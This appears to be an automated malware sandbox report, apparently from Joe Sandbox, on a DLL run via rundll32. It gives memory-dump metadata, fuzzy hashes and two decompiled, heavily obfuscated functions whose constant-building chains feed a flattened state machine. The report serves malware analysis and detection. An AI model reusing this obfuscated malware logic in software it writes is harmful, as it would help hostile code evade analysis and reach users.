                                                                                                                                  0x002e952e
                                                                                                                                  0x002e9533
                                                                                                                                  0x002e95b5
                                                                                                                                  0x002e95b5
                                                                                                                                  0x002e95ba
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9497
                                                                                                                                  0x002e949d
                                                                                                                                  0x00000000
                                                                                                                                  0x002e94a3
                                                                                                                                  0x002e94a3
                                                                                                                                  0x00000000
                                                                                                                                  0x002e94a3
                                                                                                                                  0x002e949d
                                                                                                                                  0x002e9495
                                                                                                                                  0x002e95ef
                                                                                                                                  0x002e95f9
                                                                                                                                  0x002e95f9
                                                                                                                                  0x002e953c
                                                                                                                                  0x002e9545
                                                                                                                                  0x002e9550
                                                                                                                                  0x002e9556
                                                                                                                                  0x002e9564
                                                                                                                                  0x002e95a0
                                                                                                                                  0x002e95a2
                                                                                                                                  0x002e95ab
                                                                                                                                  0x002e95b0
                                                                                                                                  0x00000000
                                                                                                                                  0x002e95bd
                                                                                                                                  0x002e95bd
                                                                                                                                  0x002e95bd
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                                  • API String ID: 0-668800459
                                                                                                                                  • Opcode ID: c645233c1a82dd96af2bdd8a06c60dad06a7b88e4c592a53d4683dbe577c5d7a
                                                                                                                                  • Instruction ID: 076c12471b6ce9abaed08c8aee9ef9b91eeaee52b38938ac26f27acbdbd9749b
                                                                                                                                  • Opcode Fuzzy Hash: c645233c1a82dd96af2bdd8a06c60dad06a7b88e4c592a53d4683dbe577c5d7a
                                                                                                                                  • Instruction Fuzzy Hash: 6FD11FB11097808FD369CF25C48A50BBBF1FBC4758F50891EF5AA86260DBB58959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002F0F33 Relevance: 7.8, Strings: 6, Instructions: 260COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002F0F33() {
				signed int _t237;
				signed char _t246;
				signed short _t255;
				signed int _t262;
				signed char _t269;
				intOrPtr* _t292;
				signed short _t301;
				void* _t302;
				signed short _t306;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed short _t319;
				void* _t321;

				 *(_t321 + 0x20) = 0xee0abc;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
				_t262 = 0x40ff1a8;
				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
				 *(_t321 + 0x14) = 0x97563a;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
				_t309 = 0x68;
				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
				 *(_t321 + 0x54) = 0x46dfd;
				_t310 = 0x22;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
				 *(_t321 + 0x50) = 0x65d669;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
				 *(_t321 + 0x1c) = 0xa5dab8;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
				 *(_t321 + 0x58) = 0x508bac;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
				 *(_t321 + 0x38) = 0x6dc462;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
				 *(_t321 + 0x20) = 0x10f337;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
				_t311 = 0x7a;
				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
				 *(_t321 + 0x28) = 0x5a8e56;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
				 *(_t321 + 0x40) = 0x558325;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
				 *(_t321 + 0x3c) = 0x76576d;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
				 *(_t321 + 0x38) = 0x7fcfc;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
				 *(_t321 + 0x58) = 0x685aea;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
				 *(_t321 + 0x24) = 0x2cb25b;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
				 *(_t321 + 0x20) = 0x5c4f5f;
				_t312 = 0x75;
				_t306 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
				_t319 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
				 *(_t321 + 0x48) = 0x281dd4;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
				 *(_t321 + 0x60) = 0x5ec984;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
				 *(_t321 + 0x4c) = 0xbf15d9;
				_t313 = 0x6c;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
				_t314 = 0x6b;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
				 *(_t321 + 0x30) = 0x4468c3;
				_t315 = 0x7e;
				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
				while(1) {
					L1:
					_t292 =  *0x2f3e08; // 0x0
					while(1) {
						L2:
						_t237 =  *(_t321 + 0x60);
						L3:
						while(_t262 != 0x160fcc4) {
							if(_t262 == 0x26954f0) {
								 *_t237 = _t319;
								_t262 = 0xfeff895;
								 *_t292 =  *_t292 + 1;
								_t237 = _t319;
								 *(_t321 + 0x60) = _t237;
								continue;
							} else {
								if(_t262 == 0x40ff1a8) {
									_t179 = _t292 + 0x20; // 0x20
									_t237 = _t179;
									_t262 = 0x5ead19b;
									 *(_t321 + 0x60) = _t237;
									continue;
								} else {
									if(_t262 == 0x58e8483) {
										_push(_t262);
										_push(_t262);
										_t302 = 0x40;
										_t319 = E002D7FF2(_t302);
										__eflags = _t319;
										if(__eflags == 0) {
											goto L20;
										} else {
											_t262 = 0x160fcc4;
											goto L1;
										}
									} else {
										if(_t262 == 0x5ead19b) {
											_t255 = E002E7BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x2f3000);
											 *(_t321 + 0x70) = _t255;
											_t306 = _t255;
											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
											_t262 = 0x58e8483;
											while(1) {
												L1:
												_t292 =  *0x2f3e08; // 0x0
												goto L2;
											}
										} else {
											if(_t262 == 0xd41016e) {
												E002E8519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
												L20:
												_t292 =  *0x2f3e08; // 0x0
											} else {
												if(_t262 != 0xfeff895) {
													L17:
													__eflags = _t262 - 0x20f61b3;
													if(__eflags != 0) {
														L2:
														_t237 =  *(_t321 + 0x60);
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
													continue;
												}
											}
										}
									}
								}
							}
							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
							__eflags = 1;
							return 1;
						}
						_push( *(_t321 + 0x1c));
						_push( *(_t321 + 0x38));
						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
						E002E1652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E002EDCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x2d1590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
						E002DA8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
						_t321 = _t321 + 0x3c;
						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
						_t246 =  *((intOrPtr*)(_t306 + 6));
						_t269 =  *((intOrPtr*)(_t306 + 7));
						_t306 = _t306 + 8;
						_t262 = 0x26954f0;
						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
						__eflags = _t301;
						 *(_t319 + 0x18) = _t301;
						_t292 =  *0x2f3e08; // 0x0
						goto L17;
					}
				}
			}





















                                                                                                                                  0x002f0f36
                                                                                                                                  0x002f0f40
                                                                                                                                  0x002f0f48
                                                                                                                                  0x002f0f56
                                                                                                                                  0x002f0f5a
                                                                                                                                  0x002f0f62
                                                                                                                                  0x002f0f6a
                                                                                                                                  0x002f0f72
                                                                                                                                  0x002f0f80
                                                                                                                                  0x002f0f85
                                                                                                                                  0x002f0f8b
                                                                                                                                  0x002f0f93
                                                                                                                                  0x002f0fa0
                                                                                                                                  0x002f0fa3
                                                                                                                                  0x002f0fa7
                                                                                                                                  0x002f0faf
                                                                                                                                  0x002f0fb7
                                                                                                                                  0x002f0fbc
                                                                                                                                  0x002f0fc4
                                                                                                                                  0x002f0fd1
                                                                                                                                  0x002f0fd5
                                                                                                                                  0x002f0fda
                                                                                                                                  0x002f0fdf
                                                                                                                                  0x002f0fe7
                                                                                                                                  0x002f0fef
                                                                                                                                  0x002f0ff7
                                                                                                                                  0x002f0fff
                                                                                                                                  0x002f100f
                                                                                                                                  0x002f1013
                                                                                                                                  0x002f101b
                                                                                                                                  0x002f1023
                                                                                                                                  0x002f102b
                                                                                                                                  0x002f1035
                                                                                                                                  0x002f1036
                                                                                                                                  0x002f103a
                                                                                                                                  0x002f103f
                                                                                                                                  0x002f1047
                                                                                                                                  0x002f104f
                                                                                                                                  0x002f105d
                                                                                                                                  0x002f1061
                                                                                                                                  0x002f1066
                                                                                                                                  0x002f106e
                                                                                                                                  0x002f1076
                                                                                                                                  0x002f107e
                                                                                                                                  0x002f1086
                                                                                                                                  0x002f108e
                                                                                                                                  0x002f1096
                                                                                                                                  0x002f109a
                                                                                                                                  0x002f10a2
                                                                                                                                  0x002f10aa
                                                                                                                                  0x002f10b2
                                                                                                                                  0x002f10bc
                                                                                                                                  0x002f10c0
                                                                                                                                  0x002f10c8
                                                                                                                                  0x002f10d0
                                                                                                                                  0x002f10d8
                                                                                                                                  0x002f10e0
                                                                                                                                  0x002f10e8
                                                                                                                                  0x002f10f0
                                                                                                                                  0x002f10f8
                                                                                                                                  0x002f10fd
                                                                                                                                  0x002f1107
                                                                                                                                  0x002f1116
                                                                                                                                  0x002f1119
                                                                                                                                  0x002f111d
                                                                                                                                  0x002f1129
                                                                                                                                  0x002f112d
                                                                                                                                  0x002f1131
                                                                                                                                  0x002f1139
                                                                                                                                  0x002f1141
                                                                                                                                  0x002f1149
                                                                                                                                  0x002f114e
                                                                                                                                  0x002f1156
                                                                                                                                  0x002f115e
                                                                                                                                  0x002f1166
                                                                                                                                  0x002f116e
                                                                                                                                  0x002f1176
                                                                                                                                  0x002f1182
                                                                                                                                  0x002f1187
                                                                                                                                  0x002f1191
                                                                                                                                  0x002f1196
                                                                                                                                  0x002f119c
                                                                                                                                  0x002f11a4
                                                                                                                                  0x002f11b1
                                                                                                                                  0x002f11b2
                                                                                                                                  0x002f11bc
                                                                                                                                  0x002f11c5
                                                                                                                                  0x002f11c9
                                                                                                                                  0x002f11d1
                                                                                                                                  0x002f11d1
                                                                                                                                  0x002f11d1
                                                                                                                                  0x002f11d7
                                                                                                                                  0x002f11d7
                                                                                                                                  0x002f11d7
                                                                                                                                  0x00000000
                                                                                                                                  0x002f11db
                                                                                                                                  0x002f11ed
                                                                                                                                  0x002f12a8
                                                                                                                                  0x002f12aa
                                                                                                                                  0x002f12af
                                                                                                                                  0x002f12b1
                                                                                                                                  0x002f12b3
                                                                                                                                  0x00000000
                                                                                                                                  0x002f11f3
                                                                                                                                  0x002f11f9
                                                                                                                                  0x002f1297
                                                                                                                                  0x002f1297
                                                                                                                                  0x002f129a
                                                                                                                                  0x002f129f
                                                                                                                                  0x00000000
                                                                                                                                  0x002f11ff
                                                                                                                                  0x002f1205
                                                                                                                                  0x002f1277
                                                                                                                                  0x002f1278
                                                                                                                                  0x002f127b
                                                                                                                                  0x002f1281
                                                                                                                                  0x002f1285
                                                                                                                                  0x002f1287
                                                                                                                                  0x00000000
                                                                                                                                  0x002f128d
                                                                                                                                  0x002f128d
                                                                                                                                  0x00000000
                                                                                                                                  0x002f128d
                                                                                                                                  0x002f1207
                                                                                                                                  0x002f120d
                                                                                                                                  0x002f124c
                                                                                                                                  0x002f1252
                                                                                                                                  0x002f1256
                                                                                                                                  0x002f125d
                                                                                                                                  0x002f1261
                                                                                                                                  0x002f11d1
                                                                                                                                  0x002f11d1
                                                                                                                                  0x002f11d1
                                                                                                                                  0x00000000
                                                                                                                                  0x002f11d1
                                                                                                                                  0x002f120f
                                                                                                                                  0x002f1215
                                                                                                                                  0x002f138c
                                                                                                                                  0x002f1392
                                                                                                                                  0x002f1392
                                                                                                                                  0x002f121b
                                                                                                                                  0x002f1221
                                                                                                                                  0x002f1373
                                                                                                                                  0x002f1373
                                                                                                                                  0x002f1379
                                                                                                                                  0x002f11d7
                                                                                                                                  0x002f11d7
                                                                                                                                  0x00000000
                                                                                                                                  0x002f11d7
                                                                                                                                  0x002f1227
                                                                                                                                  0x002f122b
                                                                                                                                  0x002f1233
                                                                                                                                  0x00000000
                                                                                                                                  0x002f1233
                                                                                                                                  0x002f1221
                                                                                                                                  0x002f1215
                                                                                                                                  0x002f120d
                                                                                                                                  0x002f1205
                                                                                                                                  0x002f11f9
                                                                                                                                  0x002f139b
                                                                                                                                  0x002f13a1
                                                                                                                                  0x002f13a7
                                                                                                                                  0x002f13ac
                                                                                                                                  0x002f13ac
                                                                                                                                  0x002f12c4
                                                                                                                                  0x002f12ca
                                                                                                                                  0x002f12d5
                                                                                                                                  0x002f12dc
                                                                                                                                  0x002f131e
                                                                                                                                  0x002f1333
                                                                                                                                  0x002f133c
                                                                                                                                  0x002f134a
                                                                                                                                  0x002f134e
                                                                                                                                  0x002f1351
                                                                                                                                  0x002f1354
                                                                                                                                  0x002f1361
                                                                                                                                  0x002f1366
                                                                                                                                  0x002f1366
                                                                                                                                  0x002f1369
                                                                                                                                  0x002f136d
                                                                                                                                  0x00000000
                                                                                                                                  0x002f136d
                                                                                                                                  0x002f11d7

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                                  • API String ID: 0-2036408213
                                                                                                                                  • Opcode ID: 1636ccb0ea5072868d28eb7fa1e218e294edb0056bbeab9d79b3352eb81666e3
                                                                                                                                  • Instruction ID: 9353c7b47abb6e9bf2614c6d3b4d83d87717e268ca50faa8cba21a3a78441d06
                                                                                                                                  • Opcode Fuzzy Hash: 1636ccb0ea5072868d28eb7fa1e218e294edb0056bbeab9d79b3352eb81666e3
                                                                                                                                  • Instruction Fuzzy Hash: CAC153715183819FC318CF25C48942BFFE1BBC9358F508A1EF69A96260D3B4D959CF86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002ED389 Relevance: 7.7, Strings: 6, Instructions: 243COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002ED389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				char _t245;
				void* _t263;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t280;
				void* _t306;
				intOrPtr _t307;
				char _t308;
				signed int* _t311;

				_push(_a28);
				_t306 = __edx;
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_t245 = E002E20B9(0);
				_v72 = _t245;
				_t311 =  &(( &_v168)[9]);
				_v84 = 0xd8cd3;
				_t307 = _t245;
				_v84 = _v84 ^ 0x2f0b54cb;
				_v84 = _v84 ^ 0x2f06dc18;
				_t280 = 0xd3d1227;
				_v116 = 0xdf2f98;
				_v116 = _v116 >> 4;
				_v116 = _v116 | 0xd629951a;
				_v116 = _v116 ^ 0xd62df7db;
				_v120 = 0x9d2532;
				_v120 = _v120 | 0x60368432;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0xc1706bd2;
				_v104 = 0x3ed100;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 << 0x10;
				_v104 = _v104 ^ 0x01fb42fe;
				_v132 = 0xac3ff1;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x8b709814;
				_v132 = _v132 + 0xffff5c55;
				_v132 = _v132 ^ 0x8a223f6b;
				_v164 = 0xc1955c;
				_v164 = _v164 + 0xe851;
				_v164 = _v164 >> 5;
				_t272 = 0x7c;
				_v164 = _v164 / _t272;
				_v164 = _v164 ^ 0x000d6983;
				_v76 = 0x371de3;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00157680;
				_v156 = 0xc7985;
				_v156 = _v156 + 0xffff997a;
				_v156 = _v156 + 0x5493;
				_v156 = _v156 ^ 0xa8ab967c;
				_v156 = _v156 ^ 0xa8a621f4;
				_v92 = 0xd6ada;
				_v92 = _v92 + 0xf102;
				_v92 = _v92 ^ 0x00049005;
				_v152 = 0xbb1df2;
				_t273 = 0x71;
				_v152 = _v152 * 0x37;
				_v152 = _v152 << 2;
				_v152 = _v152 + 0x7572;
				_v152 = _v152 ^ 0xa0c338c0;
				_v108 = 0xfb68a6;
				_v108 = _v108 / _t273;
				_v108 = _v108 * 0x38;
				_v108 = _v108 ^ 0x00745d8a;
				_v160 = 0x9cfb41;
				_v160 = _v160 >> 0xd;
				_v160 = _v160 + 0xffff2425;
				_v160 = _v160 | 0xc56bf860;
				_v160 = _v160 ^ 0xffffb927;
				_v100 = 0xcc3697;
				_v100 = _v100 << 9;
				_t274 = 0x3d;
				_v100 = _v100 / _t274;
				_v100 = _v100 ^ 0x027f162e;
				_v124 = 0x5e8102;
				_v124 = _v124 << 1;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x000928e5;
				_v96 = 0x9a5083;
				_v96 = _v96 + 0xffff88fb;
				_v96 = _v96 | 0x7e2ee754;
				_v96 = _v96 ^ 0x7eb15945;
				_v168 = 0x417f4c;
				_v168 = _v168 + 0x30ef;
				_v168 = _v168 + 0xffff0fcf;
				_v168 = _v168 | 0x766f950c;
				_v168 = _v168 ^ 0x7667a907;
				_v148 = 0xeb5ea2;
				_v148 = _v148 >> 1;
				_v148 = _v148 | 0xdbfe62fd;
				_v148 = _v148 ^ 0xdbf81284;
				_v88 = 0xc982d2;
				_v88 = _v88 | 0xbf502ba4;
				_v88 = _v88 ^ 0xbfda3d08;
				_v80 = 0x51a7e7;
				_v80 = _v80 | 0xcf4b4eb1;
				_v80 = _v80 ^ 0xcf5d8599;
				_v140 = 0x112038;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 | 0x79e3f6d0;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x000d6368;
				_v144 = 0x3c4be1;
				_v144 = _v144 << 1;
				_t275 = 0x51;
				_v144 = _v144 / _t275;
				_t276 = 0x44;
				_v144 = _v144 / _t276;
				_v144 = _v144 ^ 0x0006a926;
				_v112 = 0xebe610;
				_t277 = 6;
				_v112 = _v112 / _t277;
				_v112 = _v112 ^ 0x8e2a0175;
				_v112 = _v112 ^ 0x8e0783c0;
				_v128 = 0x507b99;
				_v128 = _v128 ^ 0xb6dd86a4;
				_v128 = _v128 + 0xffff6e9b;
				_v128 = _v128 * 0x6f;
				_v128 = _v128 ^ 0x275b8ca8;
				_v136 = 0x1b49e9;
				_v136 = _v136 * 0x22;
				_v136 = _v136 ^ 0x6bc19a50;
				_v136 = _v136 ^ 0xda04c504;
				_v136 = _v136 ^ 0xb25c1cc6;
				do {
					while(_t280 != 0x9b6c7ef) {
						if(_t280 == 0xd3d1227) {
							_t280 = 0x9b6c7ef;
							continue;
						} else {
							if(_t280 == 0xd8aa277) {
								E002E9008(_v72, _v128, _v136);
							} else {
								_t317 = _t280 - 0xdb35d55;
								if(_t280 != 0xdb35d55) {
									goto L10;
								} else {
									_push(_v164);
									_push(_v132);
									_t308 = 0x44;
									E002D4B61( &_v68, _t308);
									_push(_v92);
									_v68 = _t308;
									_push(_v156);
									_t284 = _v76;
									_v60 = E002EDCF7(_v76, 0x2d173c, _t317);
									_t307 = E002EDE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
									E002DA8B0(_v144, _v60, _v112);
									_t311 =  &(_t311[0x19]);
									_t280 = 0xd8aa277;
									continue;
								}
							}
						}
						L13:
						return _t307;
					}
					_t263 = E002D4241(_t280, _v120,  &_v72, _a28, _v104);
					_t311 =  &(_t311[3]);
					__eflags = _t263;
					if(_t263 == 0) {
						_t280 = 0xcb447d9;
						goto L10;
					} else {
						_t280 = 0xdb35d55;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t280 - 0xcb447d9;
				} while (_t280 != 0xcb447d9);
				goto L13;
			}












































                                                                                                                                  0x002ed393
                                                                                                                                  0x002ed39c
                                                                                                                                  0x002ed39e
                                                                                                                                  0x002ed3a5
                                                                                                                                  0x002ed3a6
                                                                                                                                  0x002ed3ad
                                                                                                                                  0x002ed3b4
                                                                                                                                  0x002ed3b5
                                                                                                                                  0x002ed3bc
                                                                                                                                  0x002ed3be
                                                                                                                                  0x002ed3c3
                                                                                                                                  0x002ed3ca
                                                                                                                                  0x002ed3cd
                                                                                                                                  0x002ed3d5
                                                                                                                                  0x002ed3d7
                                                                                                                                  0x002ed3e1
                                                                                                                                  0x002ed3e9
                                                                                                                                  0x002ed3ee
                                                                                                                                  0x002ed3f6
                                                                                                                                  0x002ed3fb
                                                                                                                                  0x002ed403
                                                                                                                                  0x002ed40b
                                                                                                                                  0x002ed413
                                                                                                                                  0x002ed41b
                                                                                                                                  0x002ed41f
                                                                                                                                  0x002ed427
                                                                                                                                  0x002ed42f
                                                                                                                                  0x002ed434
                                                                                                                                  0x002ed439
                                                                                                                                  0x002ed441
                                                                                                                                  0x002ed449
                                                                                                                                  0x002ed44d
                                                                                                                                  0x002ed455
                                                                                                                                  0x002ed45d
                                                                                                                                  0x002ed465
                                                                                                                                  0x002ed46d
                                                                                                                                  0x002ed475
                                                                                                                                  0x002ed480
                                                                                                                                  0x002ed485
                                                                                                                                  0x002ed48b
                                                                                                                                  0x002ed493
                                                                                                                                  0x002ed49b
                                                                                                                                  0x002ed49f
                                                                                                                                  0x002ed4a7
                                                                                                                                  0x002ed4af
                                                                                                                                  0x002ed4b7
                                                                                                                                  0x002ed4bf
                                                                                                                                  0x002ed4c7
                                                                                                                                  0x002ed4cf
                                                                                                                                  0x002ed4d7
                                                                                                                                  0x002ed4df
                                                                                                                                  0x002ed4e7
                                                                                                                                  0x002ed4f4
                                                                                                                                  0x002ed4f5
                                                                                                                                  0x002ed4f9
                                                                                                                                  0x002ed4fe
                                                                                                                                  0x002ed506
                                                                                                                                  0x002ed50e
                                                                                                                                  0x002ed51c
                                                                                                                                  0x002ed525
                                                                                                                                  0x002ed529
                                                                                                                                  0x002ed531
                                                                                                                                  0x002ed539
                                                                                                                                  0x002ed53e
                                                                                                                                  0x002ed546
                                                                                                                                  0x002ed54e
                                                                                                                                  0x002ed558
                                                                                                                                  0x002ed565
                                                                                                                                  0x002ed570
                                                                                                                                  0x002ed575
                                                                                                                                  0x002ed57b
                                                                                                                                  0x002ed583
                                                                                                                                  0x002ed58b
                                                                                                                                  0x002ed58f
                                                                                                                                  0x002ed594
                                                                                                                                  0x002ed59c
                                                                                                                                  0x002ed5a4
                                                                                                                                  0x002ed5ac
                                                                                                                                  0x002ed5b4
                                                                                                                                  0x002ed5bc
                                                                                                                                  0x002ed5c4
                                                                                                                                  0x002ed5cc
                                                                                                                                  0x002ed5d4
                                                                                                                                  0x002ed5dc
                                                                                                                                  0x002ed5e4
                                                                                                                                  0x002ed5ec
                                                                                                                                  0x002ed5f0
                                                                                                                                  0x002ed5f8
                                                                                                                                  0x002ed600
                                                                                                                                  0x002ed608
                                                                                                                                  0x002ed610
                                                                                                                                  0x002ed618
                                                                                                                                  0x002ed620
                                                                                                                                  0x002ed628
                                                                                                                                  0x002ed630
                                                                                                                                  0x002ed638
                                                                                                                                  0x002ed63d
                                                                                                                                  0x002ed645
                                                                                                                                  0x002ed64a
                                                                                                                                  0x002ed652
                                                                                                                                  0x002ed65a
                                                                                                                                  0x002ed662
                                                                                                                                  0x002ed667
                                                                                                                                  0x002ed671
                                                                                                                                  0x002ed676
                                                                                                                                  0x002ed67c
                                                                                                                                  0x002ed684
                                                                                                                                  0x002ed690
                                                                                                                                  0x002ed698
